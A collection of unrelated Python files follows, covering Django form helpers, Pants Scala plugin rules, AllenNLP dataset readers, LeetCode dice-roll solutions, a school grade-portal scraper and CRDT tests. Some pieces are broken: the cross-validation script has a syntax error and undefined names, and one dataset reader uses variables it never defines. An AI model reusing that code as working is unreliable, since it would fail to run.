assert False, "Pass enum or choices. Not both"
unique(self.enum)
return super().__init__(
coerce=coerce,
empty_value=empty_value,
choices=choices,
required=required,
widget=widget,
label=label,
initial=initial,
help_text=help_text,
error_messages=error_messages,
show_hidden_initial=show_hidden_initial,
validators=validators,
localize=localize,
disabled=disabled,
label_suffix=label_suffix,
)
"""
Enum choices must be serialized to their name rather than their enum
representation for the existing value in forms. Choices themselves are
handled by the `choices` argument in form and model fields.
"""
def prepare_value(self, value: Optional[enum.Enum]) -> Optional[str]:
if isinstance(value, enum.Enum):
return value.name
return value
T = TypeVar("T")
class FormOrFormSetDescriptor(NamedTuple):
prefix: Optional[str]
field_name: str
def get_form_or_form_set_descriptor(prefixed_name: str) -> FormOrFormSetDescriptor:
FORM_SET_REGEX = "(.*)?(-[0-9]-)(.*)"
FORM_REGEX = "(.*)?(-)(.*)"
form_set_match = re.match(FORM_SET_REGEX, prefixed_name)
form_match = re.match(FORM_REGEX, prefixed_name)
if form_set_match is not None:
return FormOrFormSetDescriptor(
field_name=form_set_match.groups()[2], prefix=form_set_match.groups()[0]
)
elif form_match is not None:
return FormOrFormSetDescriptor(
field_name=form_match.groups()[2], prefix=form_match.groups()[0]
)
return FormOrFormSetDescriptor(field_name=prefixed_name, prefix=None)
def get_form_from_form_set_or_form(
context_data: Dict[
str, Union[django_forms.BaseForm, django_forms.formsets.BaseFormSet, object]
],
descriptor: FormOrFormSetDescriptor,
) -> Optional[django_forms.BaseForm]:
for key, item in context_data.items():
if isinstance(item, django_forms.BaseForm) and item.prefix == descriptor.prefix:
return item
elif (
isinstance(item, django_forms.formsets.BaseFormSet)
and item.prefix == descriptor.prefix
):
return cast(django_forms.BaseForm, item.empty_form)
return None
def autocomplete(view_func: T) -> T:
def wrapped_view(request: HttpRequest, *args: Any, **kwargs: Any) -> HttpResponse:
response: HttpResponse = view_func( # type: ignore[operator]
request, *args, **kwargs
)
autocomplete = request.GET.get("autocomplete", None)
query = request.GET.get("query", "")
if autocomplete is None or not isinstance(response, TemplateResponse):
return response
context_data = response.context_data or {}
descriptor = get_form_or_form_set_descriptor(autocomplete)
form = get_form_from_form_set_or_form(context_data, descriptor)
if (
form is not None
and descriptor.field_name in form.fields
and isinstance(
form.fields[descriptor.field_name], django_forms.ModelChoiceField
)
and isinstance(form.fields[descriptor.field_name].widget, Autocomplete)
):
autocomplete_field = form.fields[descriptor.field_name]
to_field_name = autocomplete_field.to_field_name or "pk"
results = [
{"value": getattr(result, to_field_name), "label": str(result)}
for result in autocomplete_field.queryset.autocomplete(query)[:50]
]
return JsonResponse({"results": results})
return response
return cast(T, wrapped_view)
class FormGroup:
tag: Literal["FormGroup"] = "FormGroup"
def __init__(self, data: Any = None) -> None:
hints = get_type_hints(type(self))
without_none = {}
for hint_name, hint in hints.items():
if hint_name == "tag":
continue
if isinstance(hint, stubs._GenericAlias) and issubclass(
hint.__args__[1], type(None)
):
without_none[hint_name] = hint.__args__[0]
else:
without_none[hint_name] = hint
for arg_name, arg_type in without_none.items():
setattr(self, arg_name, arg_type(data, prefix=arg_name))
@property
def errors(self) -> Any:
collected = {}
for arg_name in get_type_hints(self).keys():
collected[arg_name] = getattr(self, arg_name).errors
return collected
def is_valid(self) -> bool:
return all(
[
getattr(self, arg_name).is_valid()
for arg_name in get_type_hints(self).keys()
]
)
@classmethod
def get_json_schema(Type, definitions: registry.Definitions) -> registry.Thing:
return serialization.named_tuple_schema(Type, definitions, exclude=["errors"])
@classmethod
def get_serialized_value(
Type: Type["FormGroup"],
class_or_instance: Union[Type["FormGroup"], "FormGroup"],
schema: registry.Thing,
) -> registry.JSON:
# if isinstance(class_or_instance, FormGroup):
# assert False, "Not yet supported"
if isinstance(class_or_instance, FormGroup):
return {
**serialization.serialize(
class_or_instance,
schema,
suppress_custom_serializer=True,
),
"tag": "FormGroup",
}
hints = (
get_type_hints(type(class_or_instance))
if isinstance(class_or_instance, FormGroup)
else get_type_hints(class_or_instance)
)
without_none = {}
for hint_name, hint in hints.items():
if hint_name == "tag":
continue
if isinstance(hint, stubs._GenericAlias) and issubclass(
hint.__args__[1], type(None)
):
without_none[hint_name] = hint.__args__[0]
else:
without_none[hint_name] = hint
return {
**serialization.serialize(
without_none,
schema,
suppress_custom_serializer=True,
),
"tag": "FormGroup",
}
|
from validator import data_validator as dv
from importlib import reload
import config
import main
import os
import pathlib
import csv
import pandas as pd
from pytorch_utils.utils import train_best_model, evaluate
folder = 'all-spectrograms-symlinks/99.5'
cwd = os.getcwd()
spectrogram_path = os.path.join(cwd, 'data', folder)
# Use "config_crossvalidation" if doing cross validation
file = 'validator/config_crossvalidation.json'
validator_path = 'validator'
csv_file = 'weighted_results_cross_validation.csv'
csv_path = os.path.join(validator_path, csv_file)
epochs = 10
def get_name(path):
path = pathlib.Path(path) # ensures standard format of paths
path = os.path.basename(path) # get folder name
return os.path.join(folder, path)
def write_to_csv(name, noise_correct, noise_total, local_correct, local_total, total_percent_correct, epochs):
with open(csv_path, 'a') as f:
writer = csv.writer(f)
writer.writerow([name,
noise_correct,
noise_total,
local_correct,
local_total,
total_percent_correct,
epochs])
def initialize_csv(csv_path):
if not os.path.exists(csv_path):
write_to_csv('Name',
'Amount Correct Noise',
'Amount Total Noise',
'Amount Correct Local',
'Amount Total Local',
'Total Percent Correct',
'Epochs')
def new_cv(skip_existing=True):
import copy
configuration = dv.read_config(file)
configuration['train']['path'] = folder
configuration['test']['path'] = folder
dirs = list(map(os.path.basename,
map(get_name, dv.get_paths(folder))))
initialize_csv(csv_path)
if skip_existing:
df = pd.read_csv(csv_path)
names = list(map(get_name, df['Name'].tolist()))
print(f"Skipping {len(names)} directories already in CSV")
dirs = list(set(dirs).difference(set(names)))
for i, dir in enumerate(dirs):
print("\n", "-" * 20)
print(f"Progress: {i}/{len(dirs)}")
print("-" * 20, "\n")
net, optimizer, criterion = main.create_model()
ignore_test = copy.copy(dirs)
ignore_test.remove(dir)
configuration['train']['ignore'] = [dir]
configuration['test']['ignore'] = ignore_test
dataset_train = main.create_dataset(configuration, model.transformations['train'], train=True)
dataset_test = main.create_dataset(configuration, model.transformations['test'], train=False)
# Create a final test loader where it has unseen data, by taking 10% of the training data
dataset_final = copy.deepcopy(dataset_train)
ntest_samples = len(dataset_train) * .1
del dataset_final.file_paths[ntest_samples:]
del dataset_train.file_paths[:ntest_samples]
assert verify_dataset_integrity(dataset_train, dataset_test)
assert verify_dataset_integrity(dataset_train, dataset_final)
weigh_classes = dict(enumerate(configuration['weigh_classes']))
train_loader = create_loader(dataset_train, train=True, weigh_classes=weigh_classes)
test_loader = create_loader(dataset_test, train=False)
final_test_loader = create_loader(dataset_final, train=False)
try:
# Reload environment variables and main file with new configuration
print("Evaluating Net on " + dir)
evaluator, best_epoch = train_best_model(epochs=1,
train_loader, test_loader,net, optimizer, criterion, net,
writer=writer,
write=False,
yield_every=50_000)
evaluator = evaluate(net, loader, copy_net=copy_net)
print('\n', evaluator, '\n')
write_to_csv(dir,
evaluator.class_details(0).amount_correct,
evaluator.class_details(0).amount_total,
evaluator.class_details(1).amount_correct,
evaluator.class_details(1).amount_total,
str(evaluator.total_percent_correct()),
evaluator.iteration,
)
except Exception as e:
print("Failed to run neural net: ", e)
raise
if __name__ == '__main__':
import glob
run_cv() |
# import argv from sys module
from sys import argv
# unpack argv to two variables
script, filename = argv
# open 'filename', defined above via argv,
# and assign contents to variable 'txt'
file_object = open(filename)
# print text & variable 'filename'
print "Here's your file %r: " % filename
# print the output of running the read
# command with no parameters on variable
# 'file_object' (which, remember contains the
# contents of 'filename')
print file_object.read()
# require input from user of the next
# file to be opened, read, and printed
# (assumedly the same file), and set
# user input to variable 'filename_again'
print "Type the filename again:"
filename_again = raw_input("> ")
# set variable 'file_object_again' to contents
# of 'filename_again' via open command
file_object_again = open(filename_again)
# print output of running read command
# on variable 'file_object_again'
print file_object_again.read()
# close both files when finished
file_object.close()
file_object_again.close() |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import Iterable, Iterator
from pants.backend.scala.subsystems.scalac import Scalac
from pants.backend.scala.target_types import (
ScalaConsumedPluginNamesField,
ScalacPluginArtifactField,
ScalacPluginNameField,
)
from pants.build_graph.address import Address, AddressInput
from pants.engine.addresses import Addresses
from pants.engine.internals.native_engine import Digest, MergeDigests
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import AllTargets, CoarsenedTargets, Target, Targets
from pants.jvm.compile import ClasspathEntry, FallibleClasspathEntry
from pants.jvm.goals import lockfile
from pants.jvm.resolve.coursier_fetch import CoursierFetchRequest
from pants.jvm.resolve.jvm_tool import rules as jvm_tool_rules
from pants.jvm.resolve.key import CoursierResolveKey
from pants.jvm.subsystems import JvmSubsystem
from pants.jvm.target_types import JvmResolveField
from pants.util.ordered_set import OrderedSet
@dataclass(frozen=True)
class ScalaPluginsForTargetWithoutResolveRequest:
target: Target
@dataclass(frozen=True)
class ScalaPluginsForTargetRequest:
target: Target
resolve_name: str
@dataclass(frozen=True)
class ScalaPluginTargetsForTarget:
plugins: Targets
artifacts: Targets
@dataclass(frozen=True)
class ScalaPluginsRequest:
plugins: Targets
artifacts: Targets
resolve: CoursierResolveKey
@classmethod
def from_target_plugins(
cls,
seq: Iterable[ScalaPluginTargetsForTarget],
resolve: CoursierResolveKey,
) -> ScalaPluginsRequest:
plugins: OrderedSet[Target] = OrderedSet()
artifacts: OrderedSet[Target] = OrderedSet()
for spft in seq:
plugins.update(spft.plugins)
artifacts.update(spft.artifacts)
return ScalaPluginsRequest(Targets(plugins), Targets(artifacts), resolve)
@dataclass(frozen=True)
class ScalaPlugins:
names: tuple[str, ...]
classpath: ClasspathEntry
def args(self, prefix: str | None = None) -> Iterator[str]:
p = f"{prefix}/" if prefix else ""
for scalac_plugin_path in self.classpath.filenames:
yield f"-Xplugin:{p}{scalac_plugin_path}"
for name in self.names:
yield f"-Xplugin-require:{name}"
class AllScalaPluginTargets(Targets):
pass
@rule
async def all_scala_plugin_targets(targets: AllTargets) -> AllScalaPluginTargets:
return AllScalaPluginTargets(
tgt for tgt in targets if tgt.has_fields((ScalacPluginArtifactField, ScalacPluginNameField))
)
@rule
async def add_resolve_name_to_plugin_request(
request: ScalaPluginsForTargetWithoutResolveRequest, jvm: JvmSubsystem
) -> ScalaPluginsForTargetRequest:
return ScalaPluginsForTargetRequest(
request.target, request.target[JvmResolveField].normalized_value(jvm)
)
@rule
async def resolve_scala_plugins_for_target(
request: ScalaPluginsForTargetRequest,
all_scala_plugins: AllScalaPluginTargets,
jvm: JvmSubsystem,
scalac: Scalac,
) -> ScalaPluginTargetsForTarget:
target = request.target
resolve = request.resolve_name
plugin_names = target.get(ScalaConsumedPluginNamesField).value
if plugin_names is None:
plugin_names_by_resolve = scalac.parsed_default_plugins()
plugin_names = tuple(plugin_names_by_resolve.get(resolve, ()))
candidate_plugins = []
artifact_address_gets = []
for plugin in all_scala_plugins:
if _plugin_name(plugin) not in plugin_names:
continue
candidate_plugins.append(plugin)
artifact_field = plugin[ScalacPluginArtifactField]
address_input = AddressInput.parse(
artifact_field.value,
relative_to=target.address.spec_path,
description_of_origin=(
f"the `{artifact_field.alias}` field from the target {artifact_field.address}"
),
)
artifact_address_gets.append(Get(Address, AddressInput, address_input))
artifact_addresses = await MultiGet(artifact_address_gets)
candidate_artifacts = await Get(Targets, Addresses(artifact_addresses))
plugins: dict[str, tuple[Target, Target]] = {} # Maps plugin name to relevant JVM artifact
for plugin, artifact in zip(candidate_plugins, candidate_artifacts):
if artifact[JvmResolveField].normalized_value(jvm) != resolve:
continue
plugins[_plugin_name(plugin)] = (plugin, artifact)
for plugin_name in plugin_names:
if plugin_name not in plugins:
raise Exception(
f"Could not find Scala plugin `{plugin_name}` in resolve `{resolve}` "
f"for target {request.target}"
)
plugin_targets, artifact_targets = zip(*plugins.values()) if plugins else ((), ())
return ScalaPluginTargetsForTarget(Targets(plugin_targets), Targets(artifact_targets))
def _plugin_name(target: Target) -> str:
return target[ScalacPluginNameField].value or target.address.target_name
@rule
async def fetch_plugins(request: ScalaPluginsRequest) -> ScalaPlugins:
# Fetch all the artifacts
coarsened_targets = await Get(
CoarsenedTargets, Addresses(target.address for target in request.artifacts)
)
fallible_artifacts = await MultiGet(
Get(
FallibleClasspathEntry,
CoursierFetchRequest(ct, resolve=request.resolve),
)
for ct in coarsened_targets
)
artifacts = FallibleClasspathEntry.if_all_succeeded(fallible_artifacts)
if artifacts is None:
failed = [i for i in fallible_artifacts if i.exit_code != 0]
raise Exception(f"Fetching local scala plugins failed: {failed}")
merged_classpath_digest = await Get(Digest, MergeDigests(i.digest for i in artifacts))
merged = ClasspathEntry.merge(merged_classpath_digest, artifacts)
names = tuple(_plugin_name(target) for target in request.plugins)
return ScalaPlugins(names=names, classpath=merged)
def rules():
return (
*collect_rules(),
*jvm_tool_rules(),
*lockfile.rules(),
)
|
from django.contrib import admin
from stud.models import AddStudent
# Register your models here.
admin.site.register(AddStudent)
|
# inspired from classification_tsv, an example from the allennlp repository
from typing import Dict, Iterable, List
import logging
from overrides import overrides
import itertools
import re
from allennlp.common.file_utils import cached_path
from allennlp.data import DatasetReader, Instance
from allennlp.data.fields import LabelField, TextField, SequenceLabelField, ArrayField
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.tokenizers import Token, Tokenizer, WhitespaceTokenizer
import pandas as pd
logger = logging.getLogger(__name__)
def _is_divider(line: str) -> bool:
empty_line = line.strip() == ""
if empty_line:
return True
else:
first_token = line.split()[0]
if first_token == "-DOCSTART-":
return True
else:
return False
@DatasetReader.register('semeval-reader')
class SemevalReader(DatasetReader):
def __init__(self,
tokenizer: Tokenizer = None,
token_indexers: Dict[str, TokenIndexer] = None,
max_tokens: int = None,
**kwargs):
super().__init__(**kwargs)
self.tokenizer = tokenizer or WhitespaceTokenizer()
self.token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}
self.max_tokens = max_tokens
def text_to_instance(self,
tokens: List[Token],
lang: List[str] = None,
tid: int = None,
sentiment: int = None) -> Instance:
'''
initial steps required:
1. collect the 3 types of resources and create a big array which contains the data
2. add all this info to instance_fields
3. return an instance
what's left?
input:
a lot of small fields of data, question is do we process it or not?
output:
an instance of the same
taking inspiration from the allennlp conll2003 dataset reader
'''
# text_tokens = self.tokenizer.tokenize(text)
sequence = TextField(tokens, self.token_indexers)
if self.max_tokens:
sequence = sequence[:self.max_tokens]
lang = lang[:self.max_tokens]
instance_fields: Dict[str, Field] = {"tokens": sequence}
if lang is None:
raise ConfigurationError(
"Dataset reader was specified to use language tags as "
"features. Pass them to text_to_instance."
)
instance_fields["lang"] = SequenceLabelField(lang, sequence)
if tid is not None:
instance_fields['tid'] = LabelField(tid)
if sentiment is not None:
instance_fields['labels'] = LabelField(sentiment)
return Instance(instance_fields)
@overrides
def _read(self, file_path: str) -> Iterable[Instance]:
'''
'''
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
with open(file_path, "r") as data_file:
logger.info("Reading instances from lines in file at: %s", file_path)
yield self.text_to_instance(tokens, lang[1:], tid, sentiment)
# def _read(self, file_path: str) -> Iterable[Instance]:
# '''
# need to rewrite this function since this shit ain't workin bruh
# I think I'll preprocess and create a modified dataset after working with the csnli library
# basically that'll help in extracting / creating a better model, which may be used to learn a gan
# so let's see where we go with it
# '''
# with open(file_path, 'r') as lines:
# for line in lines:
# label_id, sentiment, text = line.strip().split('\t')
# yield self.text_to_instance(label_id, sentiment, text)
@DatasetReader.register('semeval-reader-2')
class SemevalReader2(DatasetReader):
def __init__(self,
tokenizer: Tokenizer = None,
token_indexers: Dict[str, TokenIndexer] = None,
max_tokens: int = None,
**kwargs):
super().__init__(**kwargs)
self.tokenizer = tokenizer or WhitespaceTokenizer()
self.token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}
self.max_tokens = max_tokens
def regex_processor(self, word: str):
reg = r'[,\.\'\"\!]'
answer = re.split(reg, word)
return answer
def strempty(self, word: str):
if word == '':
return True
return False
def text_to_instance(self,
tokens: List[Token],
lang: List[str] = None,
tid: int = None,
sentiment: int = None) -> Instance:
'''
input:
tokens: a List of tokens of our input tweet
lang: a list of language markers for each token of our input tweet
output:
an instance of the same
taking inspiration from the allennlp conll2003 dataset reader
'''
# text_tokens = self.tokenizer.tokenize(text)
sequence = TextField(tokens, self.token_indexers)
if self.max_tokens:
sequence = sequence[:self.max_tokens]
lang = lang[:self.max_tokens]
instance_fields: Dict[str, Field] = {"tokens": sequence}
if lang is None:
raise ConfigurationError(
"Dataset reader was specified to use language tags as "
"features. Pass them to text_to_instance."
)
for idx, element in enumerate(lang):
# these labels correspond to the mask we use for the highlish embedder
# NOTE we haven't processed user tags, hastags, and urls separately
# but put them in eng for now
if element == '1':
lang[idx] = False
else:
lang[idx] = True
instance_fields["lang"] = SequenceLabelField(lang, sequence)
# if tid is not None:
# instance_fields['tid'] = LabelField(tid)
if sentiment is not None:
instance_fields['label'] = LabelField(sentiment)
return Instance(instance_fields)
@overrides
def _read(self, file_path: str) -> Iterable[Instance]:
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
with open(file_path, "r") as data_file:
logger.info("Reading instances from lines in file at: %s", file_path)
# Group into alternative divider / sentence chunks.
for is_divider, lines in itertools.groupby(data_file, _is_divider):
# Ignore the divider chunks, so that `lines` corresponds to the words
# of a single sentence.
if not is_divider:
fields = [line.strip().split() for line in lines]
# print(fields)
# at this point we need to do stuff to process user tags
# especially since the guys at semeval decided to not even process tweets
# properly
# user tag processing section
current_uid = None
current_user:str = None
bad_indexes = []
for idx, field in enumerate(fields):
# print(current_user)
if len(field) != 2:
bad_indexes.append(idx)
current_uid = None
current_user = None
# print(0)
continue
if field[1] == "User":
current_uid = idx
current_user = field[0]
# print(1)
continue
if current_user is not None:
# print(str("current_user: ") + current_user)
if field[0] == '_': # usernames having underscores have been separated sadly
current_user = current_user + "_"
bad_indexes.append(idx) # removed the underscore
# print(1.5)
# print(current_user[-1])
continue
elif current_user[-1] == "_":
# print("YOLO")
current_user = current_user + field[0]
# print(current_user)
bad_indexes.append(idx) # removed the current word
if len(fields) > idx + 1:
if fields[idx + 1][0] == '_':
# basically our username has more underscores
# print(2)
continue
else:
fields[current_uid] = [current_user, "User"]
current_uid = None
current_user = None
# print(3)
continue
else:
fields[current_uid] = [current_user, "User"]
current_uid = None
current_user = None
# print(4)
else:
# print(current_user[-1])
current_uid = None
current_user = None
bad_indexes = [ele for ele in reversed(bad_indexes)]
for idx in bad_indexes:
fields.pop(idx)
# section for user tags over
# processing extra ... commas, quotation marks, exclamations etc
# test_list = [[40, 1], ['hum', 0], ['dono...jaisa', 1], ['hai,', 1], ['...kaun', 0], ['yahan', 0], ['.', 2]]
# # print(fields)
# temp_list = test_list[1:]
# print(temp_list)
# replacement_list = []
# for idx, wordpair in enumerate(temp_list):
# word, lang = wordpair
# processed_words = self.regex_processor(word)
# processed_words = [[x, lang] for x in processed_words if not self.strempty(x)]
# replacement_list.append((idx, processed_words))
# replacement_list = [ele for ele in reversed(replacement_list)]
# for idx, words in replacement_list:
# test_list = test_list[:idx] + words + test_list[idx+1:]
# print(test_list)
mark = fields[0]
fields = fields[1:]
replacement_list = []
for idx, wordpair in enumerate(fields):
word, lang = wordpair
processed_words = self.regex_processor(word)
processed_words = [[x, lang] for x in processed_words if not self.strempty(x)]
replacement_list.append((idx, processed_words))
replacement_list = [ele for ele in reversed(replacement_list)]
for idx, words in replacement_list:
fields = fields[:idx] + words + fields[idx+1:]
fields.insert(0, mark)
# print(fields)
# unzipping trick returns tuples, but our Fields need lists
fields = [list(field) for field in zip(*fields)]
# print(fields)
try:
tokens_, lang = fields
except:
print(str(fields))
tid = tokens_[0]
sentiment = lang[0]
# TextField requires `Token` objects
tokens = [Token(token) for token in tokens_[1:]]
yield self.text_to_instance(tokens, lang[1:], tid, sentiment)
|
"""
1223. Dice Roll Simulation
A die simulator generates a random number from 1 to 6 for each roll.
You introduced a constraint to the generator such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained with exact n rolls.
Two sequences are considered different if at least one element differs from each other.
Since the answer may be too large, return it modulo 10^9 + 7.
Example 1:
Input: n = 2, rollMax = [1,1,2,2,2,3]
Output: 34
Explanation: There will be 2 rolls of die, if there are no constraints on the die, there are 6 * 6 = 36 possible combinations.
In this case, looking at rollMax array, the numbers 1 and 2 appear at most once consecutively,
therefore sequences (1,1) and (2,2) cannot occur, so the final answer is 36-2 = 34.
Example 2:
Input: n = 2, rollMax = [1,1,1,1,1,1]
Output: 30
Example 3:
Input: n = 3, rollMax = [1,1,1,2,2,3]
Output: 181
Constraints:
1 <= n <= 5000
rollMax.length == 6
1 <= rollMax[i] <= 15
"""
"""
solution 1: backtrack - O(6^N) in worst case
"""
class Solution:
def dieSimulator(self, n: int, rollMax: List[int]) -> int:
def backtrack(curr_roll, curr_comb):
if curr_roll == n:
self.res += 1
return
for num in [1, 2, 3, 4, 5, 6]:
if len(curr_comb) >= rollMax[num-1] and \
all(cons_num == num for cons_num in curr_comb[-rollMax[num-1]:]):
continue # 如果已经加了好几个相同的num了,那么这个num就不能再继续加入了
curr_comb.append(num)
backtrack(curr_roll + 1, curr_comb)
curr_comb.pop()
self.res = 0
backtrack(0, [])
return self.res
"""
solution 1: Backtrack - O(6^N) in worst case.
backtrack结束条件: curr_cnt == n
constraints on next_candidate: next_candidate could be from 1~6, but cannot be consecutive with prev for two long
arguments pass into backtrack function: curr_cnt, curr_num, repeat_time_of_curr_num
"""
def dieSimulator(self, n: int, roll_max: List[int]) -> int:
def backtrack(curr_cnt, curr_num, repeat_time):
if curr_cnt == n:
self.res += 1
return
for next_num in [1, 2, 3, 4, 5, 6]:
if next_num == curr_num:
if repeat_time == roll_max[curr_num-1]: # 如果已经加了好几个num了,
continue # 那么这个num就不能再继续加入了
backtrack(curr_cnt + 1, next_num, repeat_time + 1)
else:
backtrack(curr_cnt + 1, next_num, 1)
self.res = 0
backtrack(0, -1, 0)
return self.res % (10**9 + 7)
"""
solution 2: backtrack + memo - O(6n^2).
套backtrack + memo的模板即可
"""
class Solution:
def dieSimulator(self, n: int, roll_max: List[int]) -> int:
def backtrack(curr_cnt, curr_num, repeat_time):
if curr_cnt == n:
return 1
if (curr_cnt, curr_num, repeat_time) in memo:
return memo[(curr_cnt, curr_num, repeat_time)]
res = 0
for next_num in [1, 2, 3, 4, 5, 6]:
if next_num == curr_num:
if repeat_time == roll_max[curr_num-1]: # 如果已经加了好几个num了,
continue # 那么这个num就不能再继续加入了
res += backtrack(curr_cnt + 1, next_num, repeat_time + 1)
else:
res += backtrack(curr_cnt + 1, next_num, 1)
memo[(curr_cnt, curr_num, repeat_time)] = res
return res
# (curr_cnt, curr_num, repeat_time) --> from (curr_cnt, curr_num, repeat_time),
# how many ways to reach curr_cnt == n
memo = defaultdict(int)
return backtrack(0, -1, 0) % (10**9 + 7)
|
from app import create_app
if __name__ == '__main__':
app = create_app()
from app.views import _populate_ranks
_populate_ranks()
|
from bs4 import BeautifulSoup
import methods
import requests
import urllib
import parse
import json
import time
import re
import urllib.request
def uri_exists_get(uri: str) -> bool:
try:
response = requests.get(uri)
try:
response.raise_for_status()
return True
except requests.exceptions.HTTPError:
return False
except requests.exceptions.ConnectionError:
return False
main_grade = {}
def main(username, password, link):
main_grade = {}
test = "https://" + link + f"/HomeAccess/Account/LogOn?ReturnUrl=%2fHomeAccess%2fHomeAccess/Account/LogOn?ReturnUrl=%2fHomeAccess%2f"
if uri_exists_get(test) == False:
return "link_error"
soup = methods.main(username, password, link)
if re.findall("LogOnDetails.Password", str(soup)) != []:
return "error"
classes = soup.findAll("div", {"class": "AssignmentClass"})
main_grade = parse.main(classes)
return main_grade
|
import pytest
from delta_crdt.rga import RGA
from .helpers import transmit
@pytest.fixture
def rga():
return RGA("test id")
def test_rga_can_be_created(rga):
pass
def test_rga_starts_empty(rga):
assert len(rga) == 0
def test_add_right(rga):
rga.add_right(None, "a")
assert rga == ["a"]
def test_append(rga):
rga.append("a")
assert rga[0] == "a"
def test_append_twice(rga):
rga.append("a")
assert rga[0] == "a"
rga.append("b")
assert rga[1] == "b"
def test_length(rga):
rga.append("a")
assert len(rga) == 1
def test_contains(rga):
rga.append("a")
assert "a" in rga
def test_contains_after_deleted_sequence(rga):
rga.append("a")
rga.append("b")
rga.remove("a")
assert "a" not in rga
assert "b" in rga
def test_insert_after_deleted_sequence(rga):
rga.append("a")
rga.append("b")
rga.append("c")
assert rga == ["a", "b", "c"]
rga.append("d")
assert rga == ["a", "b", "c", "d"]
del rga[1]
assert rga == ["a", "c", "d"]
del rga[1]
assert rga == ["a", "d"]
rga.insert(2, "e")
assert rga == ["a", "d", "e"]
def test_insert_after_updated_sequence(rga):
rga.append("a")
rga.append("b")
rga.append("c")
assert rga == ["a", "b", "c"]
rga.append("d")
assert rga == ["a", "b", "c", "d"]
rga[1] = "g"
assert rga == ["a", "g", "c", "d"]
rga.insert(2, "e")
assert rga == ["a", "g", "e", "c", "d"]
def test_extend(rga):
rga.extend(["a", "b"])
assert rga == ["a", "b"]
@pytest.fixture
def replicas():
replica1 = RGA("test id 1")
replica2 = RGA("test id 2")
deltas1 = []
deltas1.append(replica1.append("a"))
deltas1.append(replica1.append("b"))
deltas2 = []
deltas2.append(replica2.append("c"))
deltas2.append(replica2.append("d"))
return replica1, replica2, deltas1, deltas2
def test_replica_can_handle_diffs_from_another(replicas):
replica1, replica2, deltas1, deltas2 = replicas
replica1.apply(transmit(deltas2[0]))
assert replica1 == ["c", "a", "b"]
replica1.apply(transmit(deltas2[1]))
assert replica1 == ["c", "d", "a", "b"]
def test_replica_can_handle_repeated_diffs(replicas):
replica1, replica2, deltas1, deltas2 = replicas
replica1.apply(transmit(deltas2[0]))
assert replica1 == ["c", "a", "b"]
replica1.apply(transmit(deltas2[1]))
assert replica1 == ["c", "d", "a", "b"]
replica1.apply(transmit(deltas2[0]))
assert replica1 == ["c", "d", "a", "b"]
replica1.apply(transmit(deltas2[1]))
assert replica1 == ["c", "d", "a", "b"]
def test_can_reapply_own_diffs(rga):
delta = rga.extend(["a", "b"])
assert rga == ["a", "b"]
rga.apply(delta)
assert rga == ["a", "b"]
def test_both_replicas_converge(replicas):
replica1, replica2, deltas1, deltas2 = replicas
replica1.apply(transmit(deltas2[0]))
replica1.apply(transmit(deltas2[1]))
replica2.apply(transmit(deltas1[0]))
replica2.apply(transmit(deltas1[1]))
assert replica1 == replica2
assert replica2 == ["c", "d", "a", "b"]
@pytest.fixture
def deletion(replicas):
replica1, replica2, deltas1, deltas2 = replicas
replica1.apply(transmit(deltas2[0]))
replica1.apply(transmit(deltas2[1]))
replica2.apply(transmit(deltas1[0]))
replica2.apply(transmit(deltas1[1]))
deltas1 = [replica1.remove_at(1)]
deltas2 = [replica2.remove_at(2)]
return replica1, replica2, deltas1, deltas2
def test_can_delete_concurrently(deletion):
replica1, replica2, deltas1, deltas2 = deletion
assert replica1 == ["c", "a", "b"]
assert replica2 == ["c", "d", "b"]
def test_deletion_converges(deletion):
replica1, replica2, deltas1, deltas2 = deletion
replica1.apply(transmit(deltas2[0]))
replica2.apply(transmit(deltas1[0]))
assert replica1 == ["c", "b"]
assert replica2 == ["c", "b"]
@pytest.fixture
def further(deletion):
replica1, replica2, deltas1, deltas2 = deletion
replica1.apply(transmit(deltas2[0]))
replica2.apply(transmit(deltas1[0]))
deltas1 = []
deltas2 = []
deltas1.append(replica1.append("e"))
deltas1.append(replica1.append("f"))
deltas2.append(replica2.append("g"))
deltas2.append(replica2.append("h"))
replica1.apply(transmit(deltas2[0]))
replica1.apply(transmit(deltas2[1]))
replica2.apply(transmit(deltas1[0]))
replica2.apply(transmit(deltas1[1]))
return replica1, replica2, deltas1, deltas2
def test_can_add_further_after_deletion(further):
replica1, replica2, deltas1, deltas2 = further
assert replica1 == replica2
assert replica2 == ["c", "b", "g", "h", "e", "f"]
def test_can_join_two_deltas(further):
replica1, replica2, deltas1, deltas2 = further
deltaBuffer1 = [replica1.append("k"), replica1.append("l")]
deltaBuffer2 = [replica2.append("m"), replica2.append("n")]
delta1 = replica1.join(deltaBuffer1[0], deltaBuffer1[1])
delta2 = replica2.join(deltaBuffer2[0], deltaBuffer2[1])
replica1.apply(transmit(delta2))
replica2.apply(transmit(delta1))
assert replica1 == ["c", "b", "g", "h", "e", "f", "m", "n", "k", "l"]
assert replica1 == replica2
def test_can_reapply_entire_state(further):
replica1, replica2, deltas1, deltas2 = further
replica1.apply(transmit(replica1.state))
replica2.apply(transmit(replica2.state))
assert replica1 == replica2
assert replica2 == ["c", "b", "g", "h", "e", "f"]
def test_can_insert_multiple(further):
replica1, replica2, deltas1, deltas2 = further
replica1.insert(1, "X", "Y", "Z")
assert replica1 == ["c", "X", "Y", "Z", "b", "g", "h", "e", "f"]
def test_ids_give_consistent_order():
replica1 = RGA("a")
replica2 = RGA("b")
delta_a = replica1.append("a")
replica2.append("b")
replica2.apply(delta_a)
assert replica2 == ["b", "a"]
replica3 = RGA("d")
replica4 = RGA("c")
replica3.append("d")
delta_d = replica4.append("c")
replica3.apply(delta_d)
assert replica3 == ["d", "c"]
@pytest.fixture
def missing_state():
replica1 = RGA("id1")
replica1.append("a")
replica1.append("b")
replica1.append("c")
state1 = replica1.state
replica2 = RGA("id2")
replica2.append("d")
replica2.append("e")
replica2.append("f")
state2 = replica2.state
replica3 = RGA("id3")
replica3.apply(state1)
replica3.apply(state2)
delta3 = replica3.insert(3, "X")
